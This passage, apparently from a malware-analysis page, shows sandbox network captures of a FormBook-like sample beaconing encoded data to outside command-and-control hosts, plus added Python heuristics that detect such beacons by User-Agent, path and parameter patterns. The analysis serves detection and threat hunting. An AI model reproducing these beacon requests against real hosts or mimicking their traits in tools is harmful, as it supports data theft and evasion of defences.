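    "GET /cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSew4ovcqpU8EMNhqKZYp0bCjlC2qCkSQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1\r\n"
    "Host: www.canadavinreport.site\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)\r\n"
    "\r\n"
)

# Constructed benign form post for contrast (hypothetical host and credentials).
BENIGN_POST = (
    "POST /account/login HTTP/1.1\r\n"
    "Host: portal.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36\r\n"
    "Origin: https://portal.example.com\r\n"
    "Referer: https://portal.example.com/account\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 31\r\n"
    "\r\n"
    "username=alice&password=hunter2"
)

# Assumed patterns, derived from the captures on this page.
SHORT_PATH = re.compile(r"^/[a-z0-9]{3,6}/$")
PARAM_NAME = re.compile(r"^[A-Za-z0-9]{3}$")
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
LEGACY_IE_UA = re.compile(r"MSIE \d+\.\d+; Windows NT \d+\.\d+; Trident/\d+\.\d+; [A-Z]{4,8}\)$")


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into request line, lowercase header map and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers, "body": body}


def _form_params(data: str) -> list:
    """Split name=value pairs without URL-decoding, so '+' and '/' in base64 values survive."""
    return [tuple(part.split("=", 1)) if "=" in part else (part, "") for part in data.split("&") if part]


def beacon_indicators(req: dict) -> list:
    """Return the FormBook-style traits the request exhibits (assumed heuristics)."""
    reasons = []
    h = req["headers"]
    path, _, query = req["target"].partition("?")
    if SHORT_PATH.match(path):
        reasons.append("single short lowercase path segment with trailing slash")
    params = _form_params(req["body"] if req["method"] == "POST" else query)
    if params and all(PARAM_NAME.match(name) for name, _ in params):
        reasons.append("all parameter names are 3-character tokens")
    if any(B64_BLOB.match(value) for _, value in params):
        reasons.append("base64-looking opaque blob as a parameter value")
    if LEGACY_IE_UA.search(h.get("user-agent", "")):
        reasons.append("legacy IE/Trident User-Agent with trailing unexplained token")
    if req["method"] == "POST" and h.get("cache-control") == "max-age=0" and h.get("connection") == "close":
        reasons.append("POST with Cache-Control: max-age=0 and Connection: close")
    if h.get("referer") and h.get("referer") == h.get("origin", "") + path:
        reasons.append("Referer is exactly Origin + request path")
    return reasons


def is_formbook_like(raw: str, threshold: int = 3) -> bool:
    """True when at least `threshold` indicators fire (threshold is an assumption)."""
    return len(beacon_indicators(parse_http_request(raw))) >= threshold


if __name__ == "__main__":
    for label, raw in (("session 41", SAMPLE_POST), ("session 44", SAMPLE_GET), ("benign", BENIGN_POST)):
        print(label, is_formbook_like(raw), beacon_indicators(parse_http_request(raw)))
```

The GET variant fires fewer indicators than the POST (no Origin, Referer or Cache-Control headers), which is why the score is a count rather than a single all-or-nothing match; the same path and parameter naming on a second host later in the capture is what a hunt over proxy logs would pivot on.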
                                                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                         45 | 192.168.2.9 | 50019 | 104.21.62.184 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                                                         Nov 21, 2024 16:23:42.037542105 CET | 598 | OUT | POST /z3ox/ HTTP/1.1
                                                                                                                        Host: www.questmatch.pro
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.questmatch.pro
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.questmatch.pro/z3ox/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 61 54 39 74 2b 67 2b 4a 65 49 37 57 4e 70 66 4d 57 71 5a 2f 6e 43 2f 45 63 74 68 49 57 33 54 48 69 43 43 41 48 30 69 6d 41 79 47 6d 43 54 69 66 54 2b 67 58 32 4e 6f 2f 52 72 64 79 33 71 41 33 76 37 78 70 64 4f 2b 73 2f 55 7a 70 4a 6d 7a 31 79 6c 4e 64 45 32 43 6d 7a 36 68 52 56 76 6f 79 34 55 4d 78 69 66 54 37 71 79 42 7a 71 36 69 35 63 50 33 4a 73 51 45 56 57 37 45 39 78 66 4b 77 77 53 62 39 6e 69 56 41 31 49 61 67 62 6c 73 78 61 77 48 51 73 45 6d 48 64 61 30 6e 41 31 74 72 46 41 50 7a 2f 6e 32 35 75 66 35 58 62 59 32 47 44 34 5a 32 31 66 4f 32 2f 46 61 67
                                                                                                                        Data Ascii: bBw=aT9t+g+JeI7WNpfMWqZ/nC/EcthIW3THiCCAH0imAyGmCTifT+gX2No/Rrdy3qA3v7xpdO+s/UzpJmz1ylNdE2Cmz6hRVvoy4UMxifT7qyBzq6i5cP3JsQEVW7E9xfKwwSb9niVA1IagblsxawHQsEmHda0nA1trFAPz/n25uf5XbY2GD4Z21fO2/Fag
Nov 21, 2024 16:23:43.312037945 CET | 1236 | IN | HTTP/1.1 404
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:43 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Origin
                                                                                                                        Vary: Access-Control-Request-Method
                                                                                                                        Vary: Access-Control-Request-Headers
                                                                                                                        X-Correlation-ID: 8a1e2e69-cbb9-4f7c-80ed-f58e88aa313c
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: 0
                                                                                                                        CF-Connecting-IP: 8.46.123.75
                                                                                                                        CF-IPCountry: US
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=epQwjXrIwDt4byp1fj9cEQ2Sdx6pIxVjFeKdiDNbLsK7R8mGVFP%2FZ%2Bi67DqlqK2ruOR%2FvILlEVPYekqk6xXGWfFB7%2FMVNs4q3uFaWCbeEov1jU0xK7dL2x5MkivhssH1F0VeKOg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61aeb96fec7d0c-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=598&delivery_rate=0&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e cd 0a c2 30 10 06 5f 25 7c e7 96 5a 5b 35 cd 03 08 5e 54 d0 9b 78 d8 26 1b 2d c6 2c a4 2d f8 43 df 5d 8a e7 19 86 f9 a2 15 f7 86 89 63 08 19 38 25 49 3d cc 17 56 1c c3 d4 8b 3a 43 a4 27 c3 60 2f 83 da ca 18 1d 32 38 1e a8 0b 3d cc 05 7b 51 77 8a 2e 70 52 7e a6 ca 4b 52 c7 c3 e9 ac 8a 4f
                                                                                                                        Data Ascii: b5$0_%|Z[5^Tx&-,-C]c8%I=V:C'`/28={Qw.pR~KRO
Nov 21, 2024 16:23:43.312063932 CET | 80 | IN | Data Raw: 25 af 02 d7 69 f6 db f1 b6 8b 5e fe e9 94 38 d0 d0 49 dc 39 18 68 2a 79 c9 eb 26 b7 6d db e4 b5 df d8 5c 2f d8 e5 7e a5 59 6b a2 aa ac 2c 32 f4 03 d9 c7 39 91 e5 ff ed 34 fd 00 00 00 ff ff 03 00 b1 e5 32 9a bc 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: %i^8I9h*y&m\/~Yk,29420


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.9 | 50020 | 104.21.62.184 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:23:44.702689886 CET | 622 | OUT | POST /z3ox/ HTTP/1.1
                                                                                                                        Host: www.questmatch.pro
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.questmatch.pro
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.questmatch.pro/z3ox/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 61 54 39 74 2b 67 2b 4a 65 49 37 57 63 35 50 4d 56 4e 46 2f 75 43 2f 44 5a 74 68 49 45 33 54 4c 69 43 2b 41 48 32 50 6a 42 42 69 6d 44 32 4f 66 55 37 55 58 37 74 6f 2f 65 37 64 33 35 4b 41 43 76 37 39 66 64 50 43 73 2f 53 66 70 4a 6e 44 31 7a 55 4e 65 48 47 44 41 6f 4b 68 54 52 76 6f 79 34 55 4d 78 69 62 44 52 71 79 4a 7a 71 4a 36 35 66 75 33 4b 79 41 45 57 66 62 45 39 36 2f 4b 4b 77 53 61 53 6e 6e 4d 72 31 4f 65 67 62 6e 30 78 5a 6c 7a 54 33 55 6d 46 5a 61 31 4e 42 46 74 75 4a 52 58 37 38 47 6d 4f 37 4d 42 76 56 5a 4b 59 53 4b 51 74 67 49 4f 52 34 69 54 49 4e 51 6d 69 6a 38 4d 34 48 6c 4f 6f 69 55 43 7a 33 73 6a 75 4a 67 3d 3d
                                                                                                                        Data Ascii: bBw=aT9t+g+JeI7Wc5PMVNF/uC/DZthIE3TLiC+AH2PjBBimD2OfU7UX7to/e7d35KACv79fdPCs/SfpJnD1zUNeHGDAoKhTRvoy4UMxibDRqyJzqJ65fu3KyAEWfbE96/KKwSaSnnMr1Oegbn0xZlzT3UmFZa1NBFtuJRX78GmO7MBvVZKYSKQtgIOR4iTINQmij8M4HlOoiUCz3sjuJg==
Nov 21, 2024 16:23:46.146347046 CET | 1236 | IN | HTTP/1.1 404
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:45 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Origin
                                                                                                                        Vary: Access-Control-Request-Method
                                                                                                                        Vary: Access-Control-Request-Headers
                                                                                                                        X-Correlation-ID: 877f869d-e1be-4a7d-a30a-a283ec793ede
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: 0
                                                                                                                        CF-Connecting-IP: 8.46.123.75
                                                                                                                        CF-IPCountry: US
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w7zbUUpuOvlSvDbnIcZjgdnrJrq%2Ba0PHksUrIm6JbBSr8SbcBjgDXM8xKR9PhmB4KM477kfGKQPjBkd3jOaX0KPPOMBhFL5C%2FguDU9apvpDDB3%2FmvrFA2iiubbYWjgSBNUbq44o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61aecacb980f68-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=16177&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=622&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 62 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e c1 0a 82 40 14 45 7f 65 b8 6b 87 2c 25 6d 3e 20 68 53 41 ee a2 c5 d3 f7 2c 69 9a 07 a3 42 25 fe 7b 84 eb 73 38 9c 09 b5 f2 07 2e 8c de 27 90 18 35 f6 70 13 1a 65 81 cb d3 3c 41 a0 97 c0 e1 a8 83 d9 eb 18 18 09 58 06 ea 7c 0f 77 c5 51 cd 83 02 7b 89 a6 fd 53 d3 6a 34 e7 d3 a5 32 ab 6f a6 ef
                                                                                                                        Data Ascii: b4$@Eek,%m> hSA,iB%{s8.'5pe<AX|wQ{Sj42o
Nov 21, 2024 16:23:46.146656990 CET | 78 | IN | Data Raw: 15 6e f3 df af c7 fb 21 b4 ba a4 63 14 4f 43 a7 e1 c0 70 28 8b a2 2d b7 3b b6 b2 ae c5 e6 54 b0 a5 2c 25 4b 9b 32 93 a6 d8 65 c2 82 04 fd 40 cd b3 8a d4 c8 72 3b cf 3f 00 00 00 ff ff 03 00 7f f5 6e b0 bc 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: n!cOCp(-;T,%K2e@r;?n0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.9 | 50021 | 104.21.62.184 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:23:47.383749008 CET | 1635 | OUT | POST /z3ox/ HTTP/1.1
                                                                                                                        Host: www.questmatch.pro
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.questmatch.pro
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.questmatch.pro/z3ox/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 61 54 39 74 2b 67 2b 4a 65 49 37 57 63 35 50 4d 56 4e 46 2f 75 43 2f 44 5a 74 68 49 45 33 54 4c 69 43 2b 41 48 32 50 6a 42 42 71 6d 44 45 47 66 53 63 49 58 36 74 6f 2f 59 4c 64 32 35 4b 41 6c 76 37 56 44 64 50 4f 61 2f 58 44 70 4b 42 66 31 30 68 74 65 51 32 44 41 33 36 68 53 56 76 70 6f 34 55 38 74 69 66 6e 52 71 79 4a 7a 71 4f 43 35 4c 76 33 4b 77 41 45 56 57 37 45 59 78 66 4c 45 77 53 43 6f 6e 6e 35 51 79 2b 2b 67 63 48 6b 78 66 54 76 54 37 55 6d 39 65 61 31 56 42 46 67 2b 4a 52 37 33 38 47 44 54 37 50 68 76 58 63 72 47 47 49 63 50 78 49 71 74 31 7a 4c 77 45 6d 65 66 6a 74 4e 78 51 6e 33 4e 6a 6b 50 39 78 66 4b 34 56 64 53 41 79 52 70 6c 56 4a 51 71 49 51 54 59 4d 66 4e 50 4d 2f 68 4b 49 35 4e 77 6b 39 6c 5a 54 33 54 37 6c 6c 48 4c 68 4b 34 79 62 38 70 75 71 47 79 30 59 79 73 56 6b 75 33 6e 47 75 5a 50 4a 33 4e 64 68 70 59 67 70 61 6d 34 45 49 59 51 44 62 55 34 56 42 37 67 59 7a 4d 53 77 44 4f 4d 68 42 6a 42 64 48 4a 30 71 6a 74 44 63 6a 55 55 52 42 65 36 50 35 6e 35 50 67 46 47 36 4c [TRUNCATED]
                                                                                                                        Data Ascii: bBw=aT9t+g+JeI7Wc5PMVNF/uC/DZthIE3TLiC+AH2PjBBqmDEGfScIX6to/YLd25KAlv7VDdPOa/XDpKBf10hteQ2DA36hSVvpo4U8tifnRqyJzqOC5Lv3KwAEVW7EYxfLEwSConn5Qy++gcHkxfTvT7Um9ea1VBFg+JR738GDT7PhvXcrGGIcPxIqt1zLwEmefjtNxQn3NjkP9xfK4VdSAyRplVJQqIQTYMfNPM/hKI5Nwk9lZT3T7llHLhK4yb8puqGy0YysVku3nGuZPJ3NdhpYgpam4EIYQDbU4VB7gYzMSwDOMhBjBdHJ0qjtDcjUURBe6P5n5PgFG6LNw3jqQ04I/UMdVhG1CkALLDeNcnJcn3DFIlpXlRLyWXTswCawyEKT0kBFGgDluV6n7fzepxmct/Y4W7FyQS+ymK/P1aFzWwGDUAcmi5RPLNIJ6lnvwRU90FfEI1FiWFKeZrSV9h+dul5s2d8ByETwpKvs/wf8XCfsjsZMLW4o0byzDp7c+hxLSPwaSs4wVXcM0v0M/igpCbTtkgreN/fAdTrzdFb7Wh7RbhbtuN+y3mccyZxSVInMRmig9wotPUfbbscNH9AAmfZs06aIhH3Me40LbgXU61ZrwkKhvf1M59hC9lTiB/1kq4v09R63sEIQCjkR1mgIW8EJKPbUhg1ZSqoLIwUoQLSaCUw6ACZazBfuNwRp2bg2CHYCPbqSH2qi2P9qduiTCYy5FcR/iCuXpdQ1K93WZ941gOeu37AQeKmInX5Oab9EESnVf0q25pDFv25LhqixPxRjy/4sSG1y0iR1OHB+eVw9G9+PcQPK8Ye5/98T81E9TEALK3QiAgWl7shNDhgzvWMhNxNpO7+XLRUpisaVywYXUuVEFiLhgp8Nb8h6B9bTsf5dQkBntqU6cVIMqpgX96ZJhHtb1Cp02pZGIBc9+NFyBpXEYC+n//3UpPevYghfaH6buHH6ZVj1Od5abw/6/LnSMKEHqbfv5zoYnzzsdkBuS [TRUNCATED]
Nov 21, 2024 16:23:48.760806084 CET | 1236 | IN | HTTP/1.1 404
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:48 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Origin
                                                                                                                        Vary: Access-Control-Request-Method
                                                                                                                        Vary: Access-Control-Request-Headers
                                                                                                                        X-Correlation-ID: 8c7b566c-d0ba-4891-9051-7eac1f55bfa7
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: 0
                                                                                                                        CF-Connecting-IP: 8.46.123.75
                                                                                                                        CF-IPCountry: US
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n4hR30qa2BmAeYbtZrA4KWLe%2FG1wKQYFtvZwy5%2FT%2BG77%2Fq2AWvwTQw4vStdMrSnFFByC96RmCfQI6LZAlQu6WWU4xTFRCR0UHn%2FQneeboY74qK5rvVK4EAP4vJWtcfsmD9UXgS0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61aedb6c8c1871-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2402&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1635&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 4d 0a c2 30 14 06 af 12 be 75 4b 5b 6c ac e6 00 82 9b 2a d8 9d b8 78 f9 53 31 e6 41 9a 82 5a 7a 77 11 d7 33 0c 33 43 b3 7d 43 c5 29 84 02 2e 25 4e 23 d4 0c c3 d6 41 b5 75 5b 20 d2 d3 41 a1 e7 2c 76 3c 45 8b 02 d6 65 ba 87 11 ea 8c 9e c5 8d a2 0d 2e 09 ff a3 c2 73 12 c7 c3 69 10
                                                                                                                        Data Ascii: b5$M0uK[l*xS1AZzw33C}C).%N#Au[ A,v<Ee.si
Nov 21, 2024 16:23:48.760831118 CET | 83 | IN | Data Raw: d5 67 c5 af 0a 97 e5 e7 eb e9 ba 8f 9e ff e9 94 5c a0 7c e7 b8 b7 50 d8 98 4e cb f5 da 94 b6 d6 54 b6 9b 6d 53 6e 6b d9 94 9d 23 d3 78 29 b5 a7 0e 05 c6 4c e6 31 24 32 ee 7f bb 2c 5f 00 00 00 ff ff 03 00 9a 54 75 2d bc 00 00 00 0d 0a 30 0d 0a 0d
                                                                                                                        Data Ascii: g\|PNTmSnk#x)L1$2,_Tu-0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.9 | 50022 | 104.21.62.184 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:23:50.057804108 CET | 340 | OUT | GET /z3ox/?bBw=XRVN9XS8GrL3N+/sXJw1nASfMdlrVHj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhUirL/6ZuF4cRwiIE0+ehkyVFqeLMeg==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.questmatch.pro
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:23:51.334629059 CET | 1096 | IN | HTTP/1.1 404
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:51 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Origin
                                                                                                                        Vary: Access-Control-Request-Method
                                                                                                                        Vary: Access-Control-Request-Headers
                                                                                                                        X-Correlation-ID: 8721ec9c-db07-4982-9fd4-f49803025f98
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: 0
                                                                                                                        CF-Connecting-IP: 8.46.123.75
                                                                                                                        CF-IPCountry: US
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m8X2fbJy6mlke3ZOAmlxTrrAUrul1fWp%2Bf1bSBMbmQ3so8U1tTvUFvouRxmVSadUIP6S%2BcYgGT12MdCUCVn37nNjBCtz0pWVqG1PYECPPQV5blgzCrdS1iYf6ldM0V0lN473fpY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61aeeb8c9a42a6-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1587&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=340&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 21, 2024 16:23:51.335769892 CET | 198 | IN | Data Raw: 62 62 0d 0a 7b 22 62 6f 64 79 22 3a 6e 75 6c 6c 2c 22 65 72 72 6f 72 73 22 3a 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6e 61 6d 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 64 65 74 61 69 6c 73 22 3a 5b 22 4e 6f 20 68 61 6e 64 6c 65 72 20 66 6f
                                                                                                                        Data Ascii: bb{"body":null,"errors":{"code":404,"name":"Not Found","details":["No handler found for GET /z3ox/"]},"debugInfo":{"correlationId":"8721ec9c-db07-4982-9fd4-f49803025f98","stackTrace":null}}0
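
The four sessions above, and the one that follows to www.bser101pp.buzz, carry the same request shape regardless of host: a POST to a four-character directory with a single form parameter (bBw=) whose value uses the base64 alphabet, Origin and Referer set to that same URL, Connection: close, and a User-Agent claiming MSIE 10 on Windows NT 6.1 with an extra capitalised token (MATMJS); the check-in is a GET to the same directory with two such parameters (bBw=...&PBk=...). Every host answers 404 through Cloudflare, so the response code says nothing about whether the beacon reached its operator; the traits worth alerting on are in the request. The script below is an added example, not part of the Joe Sandbox report or of the sample's own code: it scores requests transcribed from these sessions (bodies shortened), plus one constructed benign form post as a control, against those traits and extracts (host, path) pairs. The dict layout, indicator names, the threshold of three co-occurring traits, the four-character directory and three-character parameter-name lengths, and the regex for the User-Agent token are assumptions drawn from this capture alone.

```python
import re

# Constructed fixture transcribed from the captured sessions above: method, path
# and headers as seen on the wire, bodies shortened to their leading bytes. The
# last entry is a constructed benign form post used as a control. The dict
# layout is this example's own, not the sandbox report's.
UA = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)"
SAMPLES = [
    {"method": "POST", "path": "/z3ox/",
     "headers": {"Host": "www.questmatch.pro", "Origin": "http://www.questmatch.pro",
                 "Referer": "http://www.questmatch.pro/z3ox/", "Connection": "close",
                 "Content-Type": "application/x-www-form-urlencoded", "User-Agent": UA},
     "body": "bBw=aT9t+g+JeI7Wc5PMVNF/uC/DZthIE3TLiC+AH2PjBBimD2OfU7UX7to/e7d35KACv79fdPCs"},
    {"method": "GET",
     "path": "/z3ox/?bBw=XRVN9XS8GrL3N+/sXJw1nASfMdlrVHj65QayKB69AEGBKWeg==&PBk=f4VDN8Bp14IhbV",
     "headers": {"Host": "www.questmatch.pro", "Connection": "close", "User-Agent": UA},
     "body": ""},
    {"method": "POST", "path": "/crrp/",
     "headers": {"Host": "www.bser101pp.buzz", "Origin": "http://www.bser101pp.buzz",
                 "Referer": "http://www.bser101pp.buzz/crrp/", "Connection": "close",
                 "Content-Type": "application/x-www-form-urlencoded", "User-Agent": UA},
     "body": "bBw=jrL/a6Xy5LuQokTv5S8/74BV5YMbS+OjPn5NJoU1YUohUQng8Eau"},
    {"method": "POST", "path": "/login",
     "headers": {"Host": "intranet.example", "Origin": "https://intranet.example",
                 "Referer": "https://intranet.example/",
                 "Content-Type": "application/x-www-form-urlencoded",
                 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0"},
     "body": "user=alice&password=hunter2&remember=1"},
]

# Traits observed in the capture. The lengths (4-char directory, 3-char parameter
# names, 4-8 char capitalised UA token) are assumptions taken from this capture only.
UA_RE = re.compile(r"^Mozilla/5\.0 \(compatible; MSIE 10\.0; Windows NT 6\.1; "
                   r"Trident/6\.0; [A-Z0-9]{4,8}\)$")
DIR_RE = re.compile(r"^/[a-z0-9]{4}/$")
NAME_RE = re.compile(r"^[A-Za-z0-9]{3}$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def split_params(data):
    """Split name=value pairs without percent-decoding, so the '+' and '/'
    characters of the base64-like values survive intact."""
    pairs = []
    for part in data.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def all_opaque(pairs):
    """True when every parameter has a 3-char name and a base64-alphabet value."""
    return bool(pairs) and all(NAME_RE.match(n) and B64_RE.match(v) for n, v in pairs)


def beacon_indicators(req):
    """Return the set of beacon traits a single request exhibits."""
    h = req["headers"]
    host = h.get("Host", "")
    path, _, query = req["path"].partition("?")
    found = set()
    if UA_RE.match(h.get("User-Agent", "")):
        found.add("ua_msie10_trident_token")
    if DIR_RE.match(path):
        found.add("four_char_dir")
    if h.get("Connection", "").lower() == "close":
        found.add("connection_close")
    if req["method"] == "POST":
        pairs = split_params(req["body"])
        if (h.get("Content-Type") == "application/x-www-form-urlencoded"
                and len(pairs) == 1 and all_opaque(pairs)):
            found.add("single_opaque_form_param")
        # Origin and Referer point back at the beacon URL itself over plain HTTP.
        if (h.get("Origin") == "http://" + host
                and h.get("Referer") == "http://" + host + path):
            found.add("self_referer")
    elif req["method"] == "GET":
        pairs = split_params(query)
        if len(pairs) == 2 and all_opaque(pairs):
            found.add("two_opaque_query_params")
    return found


def is_formbook_like(req, threshold=3):
    """Flag when at least `threshold` traits co-occur (the threshold is an assumption)."""
    return len(beacon_indicators(req)) >= threshold


def extract_iocs(reqs):
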